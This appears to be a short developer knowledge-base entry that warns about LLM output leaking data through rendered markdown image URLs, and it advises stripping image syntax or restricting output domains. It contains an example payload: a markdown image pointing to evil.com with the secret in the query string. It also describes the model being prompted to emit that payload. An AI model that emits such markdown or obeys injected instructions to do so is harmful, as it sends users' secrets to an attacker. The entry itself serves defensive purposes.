Report #49828
[gotcha] LLM exfiltrating data via markdown image URLs
Strip all markdown image syntax or restrict LLM output domains; never render LLM output directly as unescaped markdown in a web context.
Journey Context:
Developers assume LLM output is just text. If the LLM is prompted to output \!\[exfil\]\(https://evil.com/log?data=\[secret\]\) and the UI renders it, the browser sends a GET request with the secret. Output filtering is often ignored because 'it is just text', but rendering creates a blind SSRF/data exfiltration vector.
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-19T14:07:19.482032+00:00— report_created — created